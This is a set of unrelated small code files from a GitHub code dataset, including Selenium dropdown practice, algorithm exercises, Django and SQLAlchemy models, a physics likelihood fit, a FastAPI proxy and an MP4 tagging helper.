{}\".format(predicate))\n","repo_name":"duducosmos/logml","sub_path":"validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73259588946","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support.select import Select\nimport time\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.maximize_window()\ndriver.implicitly_wait(5)\ndriver.get('https://www.facebook.com/')\n\n\ndef selectDropDownUsing(selectElement, SelectByValue):\n select = Select(selectElement)\n select.select_by_value(SelectByValue)\n\n\ndef deSelectDropDownUsing(selectElement, SelectByValue):\n select = Select(selectElement)\n select.deselect_by_value(SelectByValue)\n\n\ndef isMultiple(selectElement):\n select = Select(selectElement)\n return select.is_multiple\n\n\ndef printAllTheListItems(selectElement):\n select = Select(selectElement)\n listOfItems = select.options\n for items in listOfItems:\n print(items.text)\n\n\ndef selectItemFrom(selectElement, valueToBeSelected):\n select = Select(selectElement)\n listOfItems = select.options\n for items in listOfItems:\n if items.text == valueToBeSelected:\n items.click()\n break\n\n\n# select without using select\ndef selectWithoutSelect(xpathExpression, valueToBeSelected):\n listOfItems = driver.find_elements(By.XPATH, xpathExpression)\n for items in listOfItems:\n if items.text == valueToBeSelected:\n items.click()\n break\n\n\nday_DropDown = driver.find_element(By.ID, 'day')\nmonth_DropDown = driver.find_element(By.ID, 'month')\nyear_DropDown = driver.find_element(By.ID, 'year')\n\n# selecting\nselectDropDownUsing(day_DropDown, '4')\nselectDropDownUsing(month_DropDown, '7')\nselectDropDownUsing(year_DropDown, 
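# The validate_meta rules above reduce to counting '#' delimiters: exactly
# two means one well-formed key expression. A stand-alone restatement of that
# rule (a hypothetical helper using plain ValueError in place of the
# project's exception classes):
def check_key_expression(phrase):
    n = phrase.count("#")
    if n == 0:
        raise ValueError("no # symbol found")
    if n == 1:
        raise ValueError("# expression is not closed")
    if n > 2:
        raise ValueError("more than two # symbols found")

check_key_expression("ask #X# something")  # passes silently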
'1991')\n\nprint(isMultiple(day_DropDown))\nprint(isMultiple(month_DropDown))\nprint(isMultiple(year_DropDown))\n\n# Deselecting\ntry:\n deSelectDropDownUsing(day_DropDown, '4')\n deSelectDropDownUsing(month_DropDown, '7')\n deSelectDropDownUsing(year_DropDown, '1991')\nexcept Exception as e:\n print(e, ' found')\n\nprintAllTheListItems(month_DropDown)\n\nselectItemFrom(month_DropDown, 'Jun')\n\nselectWithoutSelect(\".//*[@id='month']/option\", 'Dec')\n\ntime.sleep(5)\ndriver.quit()\n","repo_name":"dashmation/PyMation","sub_path":"LearnSelenium/HandlingDropDownUsingDef.py","file_name":"HandlingDropDownUsingDef.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28839275961","text":"from sys import stdin\n\n\nclass PuyoPyuo(object):\n\n def __init__(self, arr):\n self.arr = arr\n self.visited = None\n\n def _find_same_color(self, x, y, c, k):\n if x < 0 or x >= 12:\n return 0\n if y < 0 or y >= 6:\n return 0\n if self.arr[x][y] != c:\n return 0\n if self.visited[x][y] != 0:\n return 0\n\n assert self.visited is not None \n self.visited[x][y] = k\n count = self._find_same_color(x+1, y, c, k) +\\\n self._find_same_color(x, y+1, c, k) +\\\n self._find_same_color(x-1, y, c, k) +\\\n self._find_same_color(x, y-1, c, k)\n return count + 1\n\n def boom_checker(self):\n self.visited = [[False]*6 for _ in range(12)]\n boom_list = []\n k = 0\n cnt = 0\n for i in range(12):\n for j in range(6):\n if self.arr[i][j] != '.':\n k += 1\n cnt = self._find_same_color(\n i, j, self.arr[i][j], k)\n if cnt >= 4:\n boom_list.append(k)\n return boom_list\n\n def boom(self, boom_list):\n assert self.visited is not None \n for i in range(12):\n for j in range(6):\n if self.visited[i][j] in boom_list:\n self.arr[i][j] = '.'\n \n for i in range(6):\n for j in range(11, -1, -1):\n if self.arr[j][i] != '.':\n continue\n for k in range(j-1, -1, -1):\n if self.arr[k][i] != '.':\n self.arr[j][i] = self.arr[k][i]\n self.arr[k][i] = '.'\n break\n\n def get_boom_count(self):\n count = 0\n while True:\n boom_list = self.boom_checker()\n if len(boom_list) == 0:\n break\n self.boom(boom_list)\n # self._print()\n count += 1\n return count\n\n\nif __name__ == '__main__':\n rd = stdin.readline\n arr = [list(rd().strip()) for _ in range(12)]\n pp = PuyoPyuo(arr)\n print(pp.get_boom_count())\n","repo_name":"wonjaek36/algorithm_test","sub_path":"baekjoon/11559/11559.py","file_name":"11559.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31432984727","text":"import re\nfrom collections import Counter\n\nfrom Github.Github_Api import retrieve_readme\n\n\n\n\ndef words(text): return re.findall(r'\\w+', text.lower())\n\nWORDS = Counter(words(open('Comments.xml',encoding='UTF8').read()))\nincorrect_word_list = []\n\ndef P(word, N=sum(WORDS.values())):\n \"Probability of `word`.\"\n print(N)\n return WORDS[word] / N\nprint(P('a'))\n\n\ndef correction(word):\n \"Most probable spelling correction for word.\"\n\n most_probable_word = max(candidates(word), key=P)\n #print(P(word))\n if most_probable_word != word:\n if most_probable_word != 'a':\n incorrect_word_list.append(word)\n print(('incorrect word: '+word+', Most probable word in the dictionary: '+most_probable_word))\n return False\n else:\n print('correct word')\n\n else:\n print(('correct word: '+word))\n return True\n\n\n\n\ndef candidates(word):\n \"Generate possible spelling 
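# The boom detection in the PuyoPyuo class above is a four-directional flood
# fill: measure each same-colored connected region and pop regions of size
# four or more. A minimal iterative version of that core step (a
# hypothetical helper; the grid is a list of strings with '.' meaning empty):
def region_size(grid, start, seen):
    color = grid[start[0]][start[1]]
    stack, size = [start], 0
    while stack:
        x, y = stack.pop()
        if not (0 <= x < len(grid) and 0 <= y < len(grid[0])):
            continue
        if (x, y) in seen or grid[x][y] != color or color == '.':
            continue
        seen.add((x, y))
        size += 1
        stack.extend([(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)])
    return size

grid = ["RR..", "RR..", "..GG"]
print(region_size(grid, (0, 0), set()))  # 4 -> this red group would pop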
corrections for word.\"\n return (known([word]) or known(edits1(word)) or known(edits2(word)) or [word])\n\n\ndef known(words):\n \"The subset of `words` that appear in the dictionary of WORDS.\"\n return set(w for w in words if w in WORDS)\n\n\ndef edits1(word):\n \"All edits that are one edit away from `word`.\"\n letters = 'abcdefghijklmnopqrstuvwxyz'\n splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]\n deletes = [L + R[1:] for L, R in splits if R]\n transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R) > 1]\n replaces = [L + c + R[1:] for L, R in splits if R for c in letters]\n inserts = [L + c + R for L, R in splits for c in letters]\n return set(deletes + transposes + replaces + inserts)\n\n\ndef edits2(word):\n \"All edits that are two edits away from `word`.\"\n return (e2 for e1 in edits1(word) for e2 in edits1(e1))\n\n\n\n\n# print correction('pylint')","repo_name":"ruchiraPeiris/Starc-Recruiter","sub_path":"Github/comm_skill/spell_checker.py","file_name":"spell_checker.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19644820990","text":"# Fazer uma função chamada ‘conta_string(v)’ que conte quantos elementos strings existem em uma lista.\n# Fazer uma função chamada ‘conta_boolean(v)’ que conte quantos elementos lógicos existem em uma lista.\n# Fazer uma função chamada ‘conta_float(v)’ que conte quantos elementos float existem em uma lista.\n# Fazer um procedimento chamado ‘copia_int(lista1, lista2)’ que copie para a lista 2 os elementos inteiros da lista 1\n\nvet = [\"Pedro\", 21, True, \"Mine\", False, \"17\", 12, \"19\", 2, \"1.2\", \"3.45\", 12.2, \"True\", \"pedrodaniluz.com.12.12.1\"]\nvet2 = [\"PythonAmizade\"]\n\n\ndef conta_string(v):\n som = 0\n for x in v:\n if type(x) == str:\n if x != \"True\" and x != \"False\":\n splited = x.split(\".\")\n tem_escrito = False\n for a in splited:\n if not a.isnumeric():\n tem_escrito = True\n if tem_escrito:\n som += 1\n return som\n\n\ndef conta_string2(v):\n som = 0\n for x in v:\n if isinstance(x, str):\n if x != \"True\" and x != \"False\":\n splited = x.split(\".\")\n if any(not a.isnumeric() for a in splited):\n som += 1\n return som\n\n\ndef conta_boolean(v):\n som = 0\n for x in v:\n if type(x) == bool:\n som += 1\n elif type(x) == str:\n if x == \"True\" or x == \"False\":\n som += 1\n return som\n\n\ndef conta_float(v):\n som = 0\n for x in v:\n if type(x) == float:\n som += 1\n elif type(x) == str:\n splited = x.split(\".\")\n if len(splited) == 2:\n if splited[0].isnumeric() and splited[1].isnumeric():\n som += 1\n return som\n\n\ndef copia_int(v1, v2):\n for x in v1:\n if type(x) == int:\n v2.append(x)\n elif type(x) == str:\n if x.isnumeric():\n v2.append(int(x))\n return v2\n\n\nprint(conta_string2(vet))\nprint(conta_boolean(vet))\nprint(conta_float(vet))\nprint(copia_int(vet, vet2))\n","repo_name":"PedroDaniluz/python_learning","sub_path":"aulas/aula10/ex_final_vetores2.py","file_name":"ex_final_vetores2.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72240105426","text":"#Exercise 45\r\n\r\nfrom collections import Counter\r\n\r\nall_characters = \"qwertyuiopasdfghjklzxcvbnm\"\r\ninp = input(\"Enter a string: \").lower()\r\n\r\ninp_char = [i for i in inp]\r\n\r\ncount = Counter(inp_char)\r\n\r\nif len(count) == 26:\r\n print(\"Yes\")\r\nelse:\r\n lst = [key[0] for key in 
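# The type-counting exercises above all follow one pattern: walk the list
# and test each element's type. A compact generic variant using isinstance
# (an illustrative helper limited to real Python types; the original file's
# extra handling of numeric-looking strings is a separate concern):
def count_type(values, wanted):
    # bool subclasses int, so exclude bools when counting ints
    return sum(isinstance(v, wanted)
               and not (wanted is int and isinstance(v, bool))
               for v in values)

sample = ["a", 1, True, 2.5, False, 3]
print(count_type(sample, str), count_type(sample, bool), count_type(sample, int))
# -> 1 2 2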
count.items() if key[1]!=0]\r\n ans = [i for i in all_characters if i not in lst]\r\n print(' '.join(ans))\r\n\r\n\r\n\r\n","repo_name":"baselhusam/The-Practice-of-Computing-Using-Python-Solved","sub_path":"Chapter 4/Problem 45.py","file_name":"Problem 45.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"38796967324","text":"from sqlalchemy.orm import session\n\nfrom app.entities.scope_entity import ScopeEntity\nfrom app.exceptions.exceptions import ScopeAlreadyExistsException, ScopeNotFoundException\n\n\nclass ScopeController:\n def __init__(self, db_session: session = None):\n self.db_session = db_session\n\n def get_scope_by_id(self, scope_id):\n \"\"\"Get scope by scope id\"\"\"\n\n scope = self.db_session.query(ScopeEntity).filter_by(scope_id=scope_id).first()\n if not scope:\n raise ScopeNotFoundException(scope_id)\n\n return scope.to_dict()\n\n def get_scope_by_name(self, scope_name):\n \"\"\"Get scope by scope name\"\"\"\n\n scope = self.db_session.query(ScopeEntity).filter_by(name=scope_name).first()\n if not scope:\n raise ScopeNotFoundException(scope_name)\n\n return scope.to_dict()\n\n def create_scope(self, new_scope: ScopeEntity):\n \"\"\"Storage new_scope in database\"\"\"\n\n scope = self.db_session.query(ScopeEntity).filter_by(name=new_scope.name).first()\n if scope:\n raise ScopeAlreadyExistsException(scope.name)\n\n self.db_session.add(new_scope)\n self.db_session.commit()\n\n return new_scope.to_dict()\n","repo_name":"ganzola/ambrosia-hades-api","sub_path":"app/controllers/scope_controller.py","file_name":"scope_controller.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26790238335","text":"# Q. Count the number of unique paths from the top left to the bottom right. 
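# Problem 45 above can be stated more directly with set arithmetic: the
# missing letters are just the alphabet minus the letters present, no
# Counter needed. A one-function sketch of that simplification:
import string

def missing_letters(text):
    return sorted(set(string.ascii_lowercase) - set(text.lower()))

gaps = missing_letters("The quick brown fox jumps over the lazy dog")
print("Yes" if not gaps else " ".join(gaps))  # -> Yes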
You are only allowed to move down or to the right.\n\n# Time complexity: O(2 ^ (n + m))\ndef brute_force(r, c, rows, cols):\n if r == rows or c == cols:\n return 0\n\n if r == rows - 1 and c == cols - 1:\n return 1\n\n return (brute_force(r+1, c, rows, cols) +\n brute_force(r, c+1, rows, cols))\n\n\nprint(brute_force(0, 0, 4, 4))\n\n\n# Memoization - Time complexity: O(n * m)\n\ndef memoization(r, c, rows, cols, cache):\n if r == rows or c == cols:\n return 0\n if cache[r][c] > 0:\n return cache[r][c]\n if r == rows - 1 and c == cols - 1:\n return 1\n\n cache[r][c] = (memoization(r+1, c, rows, cols, cache) +\n memoization(r, c+1, rows, cols, cache))\n\n return cache[r][c]\n\n\nprint(memoization(0, 0, 4, 4, [[0]*4 for i in range(4)]))\n\n\n# Dynamic Programming - Time: O(n * m), Space: O(m), where m is num of cols\ndef dp(rows, cols):\n prevRow = [0] * cols\n\n for r in range(rows - 1, -1, -1):\n curRow = [0] * cols\n curRow[cols - 1] = 1\n for c in range(cols - 2, -1, -1):\n curRow[c] = curRow[c + 1] + prevRow[c]\n prevRow = curRow\n return prevRow[0]\n\n\nprint(dp(4, 4))\n","repo_name":"Paulvitalis200/Data-Structures","sub_path":"DynamicProgramming/two_dp.py","file_name":"two_dp.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41661728486","text":"import random\nimport string\nfrom datetime import timedelta, datetime\nfrom typing import Optional\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass _AutoCleanedModel(models.Model):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.is_cleaned = False\n\n class Meta:\n abstract = True\n\n def clean(self):\n self.is_cleaned = True\n super().clean()\n\n def save(self, *args, **kwargs):\n if not self.is_cleaned:\n self.full_clean()\n super().save(*args, **kwargs)\n\n\nclass Contactable(_AutoCleanedModel):\n \"\"\"\n Different ways of contacting someone is aggregated in this mixin.\n \"\"\"\n telegram_username = models.CharField(null=False, blank=True, default='', max_length=32)\n\n class Meta:\n abstract = True\n\n\nclass User(AbstractUser, Contactable):\n first_name = models.CharField(null=False, blank=True, default='', max_length=64)\n last_name = models.CharField(null=False, blank=True, default='', max_length=64)\n telegram_user_id = models.BigIntegerField(null=True, blank=True, unique=True)\n telegram_chat_id = models.BigIntegerField(null=True, blank=True)\n\n @staticmethod\n def generate_random_username() -> str:\n return ''.join(random.choice(string.ascii_letters) for i in range(64))\n\n\nclass TargetBot(Contactable):\n creator = models.ForeignKey(User, on_delete=models.CASCADE)\n\n class Meta:\n constraints = [\n # Should be checked differently whenever contact points other than Telegram are also supported.\n models.UniqueConstraint(fields=['creator', 'telegram_username'], name=\"duplicate_bot_preventer\")\n ]\n\n\nclass Alert(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n fixed_at = models.DateTimeField(null=True)\n target_bot = models.ForeignKey(TargetBot, on_delete=models.CASCADE)\n sent = models.BooleanField(default=False)\n\n def is_fixed(self) -> bool:\n return self.fixed_at is not None\n\n def has_passed_certainty_waiting_period(self, current_time: Optional[datetime] = None):\n \"\"\"\n Determines whether the alert is fully active (i.e. 
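# As a cross-check on the three unique-path solutions above: the count has a
# closed form, C(rows + cols - 2, rows - 1), because every path is some
# ordering of (rows - 1) down-moves and (cols - 1) right-moves.
from math import comb

def unique_paths(rows, cols):
    return comb(rows + cols - 2, rows - 1)

print(unique_paths(4, 4))  # 20, matching brute_force, memoization and dp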
has waited for certainty period and has not fixed yet) or not.\n :param current_time: The current time to evaluate the alert age.\n :return: True if the alert age has passed the certainty waiting period (and hence should be informed). Otherwise False.\n \"\"\"\n return (current_time or timezone.now()) - self.created_at >= timedelta(seconds=settings.ALERT_CERTAINTY_WAIT_SECONDS)\n","repo_name":"emranbm/botmon","sub_path":"backend/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22729266390","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom iminuit import Minuit\r\n\r\n\r\ndf = pd.read_pickle('data/total_dataset.pkl')\r\ndf = pd.read_pickle('data/sig.pkl')\r\n\r\nq2 = df['q2']\r\n\r\nbin_ranges = [[0.1, 0.98],\r\n [1.1, 2.5],\r\n [2.5, 4.0],\r\n [4.0, 6.0],\r\n [6.0, 8.0],\r\n [15.0,17.0],\r\n [17.0,19.0],\r\n [11.0, 12.5],\r\n [1.0,6.0],\r\n [15.0,17.9]]\r\n\r\nn = len(bin_ranges)\r\n\r\nbins = [[] for i in range(n)]\r\n\r\nfor i in range(n):\r\n bins[i] = df[(df['q2'] > bin_ranges[i][0]) & (df['q2'] < bin_ranges[i][1])]\r\n \r\n\r\n \r\n#%%\r\n\r\nbins[0].head()\r\n\r\nplt.hist(bins[3]['costhetal'], bins=25, density=True)\r\nplt.xlabel(r'$cos(\\theta_l)$')\r\nplt.ylabel(r'Number of candidates')\r\nplt.grid()\r\nplt.show()\r\n\r\n#%%\r\n\r\ndf = pd.read_pickle('data/total_dataset.pkl')\r\ndf = pd.read_pickle('data/sig.pkl')\r\ndf = pd.read_pickle('data/acceptance_mc.pkl')\r\n\r\nctl = df['costhetal']\r\nctk = df['costhetak']\r\nphi = df['phi']\r\nq2 = df['q2']\r\n\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(ctl, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_ctl = np.polynomial.legendre.Legendre.fit(bin_center, n, 4)\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(ctk, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_ctk = np.polynomial.legendre.Legendre.fit(bin_center, n, 5)\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(phi, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_phi = np.polynomial.legendre.Legendre.fit(bin_center, n, 6)\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(q2, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_q2 = np.polynomial.legendre.Legendre.fit(bin_center, n, 5)\r\n\r\n\r\nfrom sklearn import preprocessing\r\n\r\n#%%\r\n\r\n\r\ndef d2gamma_p_d2q2_dcostheta(fl, afb, cos_theta_l, cos_theta_k, phi):\r\n \"\"\"\r\n Returns the pdf defined above\r\n :param fl: f_l observable\r\n :param afb: a_fb observable\r\n :param cos_theta_l: cos(theta_l)\r\n :return:\r\n \"\"\"\r\n ctl = cos_theta_l\r\n ctk = cos_theta_k\r\n phi = phi\r\n c2tl = 2 * ctl ** 2 - 1\r\n #acceptance = fit_ctl(ctl) \r\n #acceptance = fit_ctl(ctl) * fit_ctk(ctk) * fit_phi(phi)\r\n #average = sum(acceptance) / len(acceptance)\r\n #acceptance /= average\r\n #acceptance = 1 / fit_ctl(ctl) \r\n #average = sum(acceptance) / len(acceptance)\r\n #acceptance *= average\r\n acceptance = 2\r\n\r\n scalar_array = 3/8 * (3/2 - 1/2 * fl + 1/2 * c2tl * (1 - 3 * fl) + 8/3 * afb * ctl) * acceptance\r\n normalised_scalar_array = scalar_array \r\n \r\n #normalised_scalar_array = normalised_scalar_array[0]\r\n return normalised_scalar_array\r\n\r\ndef log_likelihood(fl, afb, _bin):\r\n \"\"\"\r\n Returns the negative log-likelihood of the pdf defined above\r\n :param fl: 
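# Stripped of Django's settings and timezone helpers, the
# has_passed_certainty_waiting_period check above is plain datetime
# arithmetic. A self-contained sketch with an illustrative 300-second wait
# (the real threshold comes from settings.ALERT_CERTAINTY_WAIT_SECONDS):
from datetime import datetime, timedelta, timezone

WAIT = timedelta(seconds=300)  # stand-in for the configured wait

def has_passed_waiting_period(created_at, now=None):
    return (now or datetime.now(timezone.utc)) - created_at >= WAIT

created = datetime(2023, 1, 1, 12, 0, tzinfo=timezone.utc)
print(has_passed_waiting_period(created, created + timedelta(seconds=301)))  # True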
f_l observable\r\n :param afb: a_fb observable\r\n :param _bin: number of the bin to fit\r\n :return:\r\n \"\"\"\r\n _bin = bins[int(_bin)]\r\n ctl = _bin['costhetal']\r\n ctk = _bin['costhetak']\r\n phi = _bin['phi']\r\n normalised_scalar_array = d2gamma_p_d2q2_dcostheta(fl=fl, afb=afb, cos_theta_l=ctl, cos_theta_k=ctk, phi=phi)\r\n return - np.sum(np.log(normalised_scalar_array))\r\n\r\n#%%\r\n\r\n\r\n#%%\r\n\r\n_test_bin = 1\r\n_test_afb = 0.7\r\n_test_fl = 0.0\r\n\r\nx = np.linspace(-1, 1, 500)\r\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 3))\r\nax1.plot(x, [log_likelihood(fl=i, afb=_test_afb, _bin=_test_bin) for i in x])\r\nax1.set_title(r'$A_{FB}$ = ' + str(_test_afb))\r\nax1.set_xlabel(r'$F_L$')\r\nax1.set_ylabel(r'$-\\mathcal{L}$')\r\nax1.grid()\r\nax2.plot(x, [log_likelihood(fl=_test_fl, afb=i, _bin=_test_bin) for i in x])\r\nax2.set_title(r'$F_{L}$ = ' + str(_test_fl))\r\nax2.set_xlabel(r'$A_{FB}$')\r\nax2.set_ylabel(r'$-\\mathcal{L}$')\r\nax2.grid()\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n#%%\r\n\r\nbin_number_to_check = 0 # bin that we want to check in more details in the next cell\r\nbin_results_to_check = None\r\n\r\nlog_likelihood.errordef = Minuit.LIKELIHOOD\r\ndecimal_places = 3\r\nstarting_point = [-0.1,0.0]\r\nfls, fl_errs = [], []\r\nafbs, afb_errs = [], []\r\nfor i in range(len(bins)):\r\n m = Minuit(log_likelihood, fl=starting_point[0], afb=starting_point[1], _bin=i)\r\n m.fixed['_bin'] = True # fixing the bin number as we don't want to optimize it\r\n m.limits=((-1.0, 1.0), (-1.0, 1.0), None)\r\n m.migrad()\r\n m.hesse()\r\n if i == bin_number_to_check:\r\n bin_results_to_check = m\r\n fls.append(m.values[0])\r\n afbs.append(m.values[1])\r\n fl_errs.append(m.errors[0])\r\n afb_errs.append(m.errors[1])\r\n print(f\"Bin {i}: {np.round(fls[i], decimal_places)} pm {np.round(fl_errs[i], decimal_places)},\", f\"{np.round(afbs[i], decimal_places)} pm {np.round(afb_errs[i], decimal_places)}. 
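# A quick sanity check that the angular pdf above integrates to one over
# cos(theta_l) in [-1, 1] before the constant acceptance factor is applied
# (a constant factor only shifts the log-likelihood, so the fitted Fl and
# Afb are unaffected):
import numpy as np

fl, afb = 0.3, 0.1
ctl = np.linspace(-1, 1, 10001)
pdf = 3/8 * (3/2 - fl/2 + (2*ctl**2 - 1)/2 * (1 - 3*fl) + 8/3 * afb * ctl)
area = ((pdf[:-1] + pdf[1:]) / 2 * np.diff(ctl)).sum()  # trapezoid rule
print(area)  # ~1.0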
Function minimum considered valid: {m.fmin.is_valid}\")\r\n \r\n \r\n#%%\r\n\r\n\r\nplt.figure(figsize=(8, 5))\r\nplt.subplot(221)\r\nbin_results_to_check.draw_mnprofile('afb', bound=3)\r\nplt.subplot(222)\r\nbin_results_to_check.draw_mnprofile('fl', bound=3)\r\n\r\n#%%\r\n'''\r\nbin_to_plot = 3\r\nnumber_of_bins_in_hist = 25\r\ncos_theta_l_bin = bins[bin_to_plot]['costhetal']\r\nhist, _bins, _ = plt.hist(cos_theta_l_bin, bins=number_of_bins_in_hist)\r\nx = np.linspace(-1, 1, number_of_bins_in_hist)\r\npdf_multiplier = np.sum(hist) * (np.max(cos_theta_l_bin) - np.min(cos_theta_l_bin)) / number_of_bins_in_hist\r\ny = d2gamma_p_d2q2_dcostheta(fl=fls[bin_to_plot], afb=afbs[bin_to_plot], cos_theta_l=x, cos_theta_k=x, phi=x) * pdf_multiplier\r\nplt.plot(x, y, label=f'Fit for bin {bin_to_plot}')\r\nplt.xlabel(r'$cos(\\theta_l)$')\r\nplt.ylabel(r'Number of candidates')\r\nplt.legend()\r\nplt.grid()\r\nplt.show()\r\nplt.tight_layout()\r\nplt.show()\r\n'''\r\n#%%\r\n\r\n\r\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(7, 3))\r\nax1.errorbar(np.linspace(0, len(bins) - 1, len(bins)), fls, yerr=fl_errs, fmt='o', markersize=2, label=r'$F_L$', color='red')\r\nax2.errorbar(np.linspace(0, len(bins) - 1, len(bins)), afbs, yerr=afb_errs, fmt='o', markersize=2, label=r'$A_{FB}$', color='red')\r\nax1.grid()\r\nax2.grid()\r\nax1.set_ylabel(r'$F_L$')\r\nax2.set_ylabel(r'$A_{FB}$')\r\nax1.set_xlabel(r'Bin number')\r\nax2.set_xlabel(r'Bin number')\r\nplt.tight_layout()\r\nplt.show()","repo_name":"ImperialTBPS3/Acceptance","sub_path":"skeletoncode_forsignaldata.py","file_name":"skeletoncode_forsignaldata.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21850413867","text":"import sys\ninput = sys.stdin.readline\n\ndef dfs(x, y, d):\n\n global answer\n\n if board[x][y] == 0:\n answer += 1\n board[x][y] = 2\n\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n\n flag = False\n\n for i in range(4):\n nd = (d+3) % 4\n nx = x + dx[nd]\n ny = y + dy[nd]\n if 0 <= nx < n and 0 <= ny < m:\n if board[nx][ny] == 0:\n flag = True\n dfs(nx, ny, nd)\n return\n d = nd\n\n if not flag:\n nd = (d + 2) % 4\n nx = x + dx[nd]\n ny = y + dy[nd]\n if 0 <= nx < n and 0 <= ny < m:\n if board[nx][ny] == 1:\n return\n dfs(nx, ny, d)\n\n\nn, m = map(int, input().split())\nr, c, d = map(int, input().split())\nboard = []\nanswer = 0\nfor _ in range(n):\n board.append(list(map(int, input().split())))\ndfs(r, c, d)\nprint(answer)\n\n\n","repo_name":"bhyun/daily-algorithm","sub_path":"2021/BOJ14503_로봇 청소기.py","file_name":"BOJ14503_로봇 청소기.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31756820369","text":"from fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nimport requests\nimport os \nimport json\n\nip = os.getenv(\"redirectIp\")\n\naddress = 'http://' + ip + ':8000'\napp = FastAPI()\n\n\nclass Task(BaseModel):\n name: str\n description: str\n\n# /task\n@app.get(\"/task\")\nasync def get_task():\n a = requests.get(url = address + '/task')\n return a.json()\n\n@app.post(\"/task\")\nasync def post_task(task: Task):\n data = {\"name\": task.name, \"description\": task.description}\n requests.post(url = address + '/task', data = json.dumps(data))\n \n\n# /task/<id>\n@app.get(\"/task/{id}\")\nasync def get_task_id(id: str):\n a = requests.get(url = address + '/task/' + id )\n return 
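# The fitting loop above reduces to a handful of iminuit calls. A minimal
# stand-alone version of that workflow on a toy least-squares cost (iminuit
# 2.x API, mirroring the errordef/limits/migrad/hesse sequence used above):
from iminuit import Minuit

def cost(fl, afb):
    return (fl - 0.3) ** 2 + (afb + 0.1) ** 2

cost.errordef = Minuit.LEAST_SQUARES
m = Minuit(cost, fl=0.0, afb=0.0)
m.limits = ((-1.0, 1.0), (-1.0, 1.0))
m.migrad()  # run the minimizer
m.hesse()   # refine the uncertainty estimates
print(m.values["fl"], m.errors["fl"], m.fmin.is_valid)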
a.json()\n\n@app.put(\"/task/{id}\")\nasync def put_task_id(id: str, task: Task):\n data = {\"name\": task.name, \"description\": task.description}\n a = requests.put(url = address + '/task/' + id, data = json.dumps(data) )\n \n \n@app.delete(\"/task/{id}\")\nasync def delete_task(id: str):\n a = requests.delete(url = address + '/task/' + id )\n\n# /healthcheck (only returns status 200)\n@app.get(\"/healthcheck\", status_code=200)\nasync def health_check():\n a = requests.get(url = address + '/healthcheck')","repo_name":"IagoMendes/CloudComputing","sub_path":"Project/redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11359790397","text":"from mutagen.mp4 import MP4, MP4Cover, error\n\nTEMPLATE_METADATA = {\n '\\xa9nam': ['Mice On Venus'], # track title\n '\\xa9ART': ['C418'], # album artist\n 'aART': ['C418'], # artist\n '\\xa9alb': ['Minecraft - Volume Alpha'], # album\n 'trkn': [(11, 24)], # track number / total\n '\\xa9day': ['2011'], # year\n 'covr': None\n}\n\n\ndef save_metadata(audio_filename, title, artist, album_artist, album, track, track_total, date, cover_filename):\n f = MP4(audio_filename)\n\n try:\n f.add_tags()\n except error:\n pass\n\n f['\\xa9nam'] = [title]\n f['\\xa9ART'] = [artist]\n f['aART'] = [album_artist]\n f['\\xa9alb'] = [album]\n f['trkn'] = [(track, track_total)]\n f['\\xa9day'] = [str(date)]\n\n with open(cover_filename, \"rb\") as cover_file:\n f[\"covr\"] = [\n MP4Cover(cover_file.read(), imageformat=MP4Cover.FORMAT_JPEG)\n ]\n\n 